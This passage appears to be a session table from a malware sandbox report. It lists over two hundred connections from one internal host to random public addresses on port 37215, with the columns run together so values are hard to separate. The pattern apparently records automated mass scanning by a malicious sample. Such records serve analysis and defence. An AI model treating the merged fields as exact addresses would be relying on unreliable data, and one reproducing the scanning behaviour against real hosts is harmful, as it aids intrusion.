                                                  17456192.168.2.1355590197.42.228.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17457192.168.2.135290065.224.151.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17458192.168.2.134754241.5.116.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17459192.168.2.1359722157.122.68.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17460192.168.2.1352480157.6.171.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17461192.168.2.1358308222.66.105.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17462192.168.2.135119671.172.28.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17463192.168.2.1333020156.140.99.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17464192.168.2.1332838157.169.105.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17465192.168.2.135078041.83.91.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17466192.168.2.134602241.35.37.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17467192.168.2.135159441.220.44.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17468192.168.2.134543041.139.208.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17469192.168.2.1339406144.89.124.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17470192.168.2.1336864184.188.112.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17471192.168.2.1346896157.64.239.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17472192.168.2.1337486197.136.195.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17473192.168.2.1351424197.101.210.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17474192.168.2.133771241.150.165.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17475192.168.2.134386675.104.54.837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17476192.168.2.133641841.114.157.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17477192.168.2.136001241.44.193.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17478192.168.2.1343300157.94.124.8537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17479192.168.2.133945241.225.125.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17480192.168.2.134695641.49.180.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17481192.168.2.1340180157.135.161.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17482192.168.2.134835841.178.74.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17483192.168.2.1358076197.165.131.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17484192.168.2.1335396157.4.89.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17485192.168.2.1337208157.10.22.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17486192.168.2.135752441.26.222.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17487192.168.2.1344882197.20.39.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17488192.168.2.1356606197.171.255.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17489192.168.2.1335340197.167.234.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17490192.168.2.1354990197.130.158.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17491192.168.2.1333764157.250.168.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17492192.168.2.135015641.37.159.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17493192.168.2.1341008157.26.134.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17494192.168.2.1345918157.52.253.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17495192.168.2.135814041.237.72.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17496192.168.2.1348506157.19.58.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17497192.168.2.135628641.100.80.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17498192.168.2.1344148124.233.114.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17499192.168.2.1355576118.237.247.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17500192.168.2.1350992157.123.131.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17501192.168.2.1337490157.64.34.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17502192.168.2.1347670197.149.7.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17503192.168.2.133714442.195.198.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17504192.168.2.13349462.185.27.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17505192.168.2.134468641.170.33.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17506192.168.2.1335758157.170.31.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17507192.168.2.1360860157.205.221.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17508192.168.2.13518704.172.96.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17509192.168.2.1338708197.200.33.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17510192.168.2.1346074157.201.238.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17511192.168.2.1341994197.248.127.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17512192.168.2.1354054219.16.200.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17513192.168.2.1357718157.68.171.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17514192.168.2.1347986207.35.251.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17515192.168.2.134309698.102.246.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17516192.168.2.133932841.44.106.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17517192.168.2.133924441.86.45.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17518192.168.2.1358232157.79.17.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17519192.168.2.1356822197.4.38.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17520192.168.2.1337426157.91.10.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17521192.168.2.1351664197.13.64.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17522192.168.2.135291058.223.56.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17523192.168.2.135501653.127.20.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17524192.168.2.1342588186.58.248.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17525192.168.2.1344378157.85.114.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17526192.168.2.1341812157.238.143.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17527192.168.2.1351178197.153.173.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17528192.168.2.1345758197.232.139.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17529192.168.2.136068041.126.241.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17530192.168.2.1333284157.64.136.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17531192.168.2.134987041.53.143.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17532192.168.2.1348880197.121.149.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17533192.168.2.1346576197.255.130.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17534192.168.2.1335806197.85.62.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17535192.168.2.1355606133.216.30.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17536192.168.2.133511841.180.176.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17537192.168.2.1339178157.114.232.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17538192.168.2.135420441.73.218.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17539192.168.2.134099241.212.79.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17540192.168.2.1335686222.20.69.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17541192.168.2.1358524157.23.227.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17542192.168.2.1351912157.139.179.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17543192.168.2.1358438157.190.9.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17544192.168.2.1360058157.86.19.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17545192.168.2.1360214181.229.33.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17546192.168.2.135490641.180.159.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17547192.168.2.134200441.153.108.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17548192.168.2.1346332157.164.234.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17549192.168.2.134990041.215.6.9637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17550192.168.2.135526641.72.179.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17551192.168.2.133856641.168.123.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17552192.168.2.136015057.103.118.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17553192.168.2.1348334179.49.11.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17554192.168.2.134647089.184.95.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17555192.168.2.1360468183.50.118.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17556192.168.2.133642441.236.153.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17557192.168.2.133635041.166.133.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17558192.168.2.1340650107.243.173.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17559192.168.2.1334800197.42.32.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17560192.168.2.134898641.117.252.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17561192.168.2.1360748157.87.25.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17562192.168.2.135085441.195.204.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17563192.168.2.1349622157.129.248.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17564192.168.2.1350788141.75.101.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17565192.168.2.1354244157.130.151.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17566192.168.2.1350238197.148.64.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17567192.168.2.133619841.232.76.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17568192.168.2.134136441.158.22.19637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17569192.168.2.1345202157.41.230.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17570192.168.2.1344326111.153.65.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17571192.168.2.1333392197.133.164.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17572192.168.2.135051685.149.83.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17573192.168.2.1345122157.75.229.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17574192.168.2.135684041.49.214.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17575192.168.2.1348332157.110.136.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17576192.168.2.1339632157.182.210.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17577192.168.2.1353902197.138.211.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17578192.168.2.1350550197.46.42.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17579192.168.2.1339552113.143.208.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17580192.168.2.134129241.8.164.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17581192.168.2.1357400199.179.199.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17582192.168.2.133539241.37.230.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17583192.168.2.1345258104.191.15.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17584192.168.2.1342998197.173.248.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17585192.168.2.134151441.30.106.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17586192.168.2.134178441.44.254.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17587192.168.2.1348110197.94.118.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17588192.168.2.1357076200.82.69.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17589192.168.2.133800036.150.70.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17590192.168.2.1355488157.165.222.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17591192.168.2.1333646197.58.98.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17592192.168.2.135766441.144.207.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17593192.168.2.134941241.74.160.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17594192.168.2.134037241.73.8.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17595192.168.2.133426871.131.229.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17596192.168.2.1358756157.67.182.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17597192.168.2.134950865.16.57.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17598192.168.2.1345214184.71.182.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17599192.168.2.1350950208.35.150.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17600192.168.2.135159241.163.253.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17601192.168.2.1359952147.63.28.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17602192.168.2.135151841.175.86.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17603192.168.2.1334176209.150.136.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17604192.168.2.1337330197.247.16.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17605192.168.2.1348338197.87.90.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17606192.168.2.1348384197.233.163.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17607192.168.2.135319241.122.173.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17608192.168.2.135068241.46.221.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17609192.168.2.134825441.72.229.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17610192.168.2.133955241.124.61.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17611192.168.2.1356172157.55.129.2337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17612192.168.2.134424699.227.88.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17613192.168.2.1335864184.216.124.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17614192.168.2.1358834157.137.79.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17615192.168.2.1343606157.198.253.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17616192.168.2.1348896197.109.105.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17617192.168.2.134710041.17.129.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17618192.168.2.1349478197.234.58.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17619192.168.2.135149657.27.181.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17620192.168.2.1350878197.142.27.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17621192.168.2.1342948157.53.249.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17622192.168.2.133636691.151.73.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17623192.168.2.1335500157.92.12.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17624192.168.2.134406441.186.101.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17625192.168.2.1341304157.139.154.16337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17626192.168.2.133560241.54.0.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17627192.168.2.1339820104.26.25.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17628192.168.2.1350976101.4.33.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17629192.168.2.1342950157.27.194.22937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17630192.168.2.133676090.197.223.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17631192.168.2.134898241.144.1.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17632192.168.2.1360178157.208.14.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17633192.168.2.1350480197.246.122.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17634192.168.2.135870241.126.207.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17635192.168.2.134163877.23.62.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17636192.168.2.1343746157.15.92.20437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17637192.168.2.135804041.189.3.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17638192.168.2.135863285.213.41.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17639192.168.2.1350870149.151.236.11837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17640192.168.2.1343768197.1.210.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17641192.168.2.1359588157.209.241.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17642192.168.2.1357386197.173.136.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17643192.168.2.1350874157.141.102.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17644192.168.2.1354160197.98.200.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17645192.168.2.134685841.97.190.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17646192.168.2.1341644197.69.203.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17647192.168.2.134466814.110.174.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17648192.168.2.1341862157.93.139.22037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17649192.168.2.135357617.53.232.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17650192.168.2.1358800146.164.152.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17651192.168.2.135193441.125.231.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17652192.168.2.1344006197.37.22.19837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17653192.168.2.135425241.110.177.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17654192.168.2.1338276197.100.116.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17655192.168.2.1345584197.4.39.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17656192.168.2.135453841.15.93.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17657192.168.2.133301041.141.230.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17658192.168.2.1348708197.72.0.23437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17659192.168.2.1347076197.13.141.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17660192.168.2.1357932157.143.174.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17661192.168.2.1338040197.185.243.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17662192.168.2.1337664157.180.232.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17663192.168.2.133486866.252.205.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17664192.168.2.133951041.246.104.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  17665192.168.2.1341276141.96.87.15837215
                                                  TimestampBytes transferredDirectionData


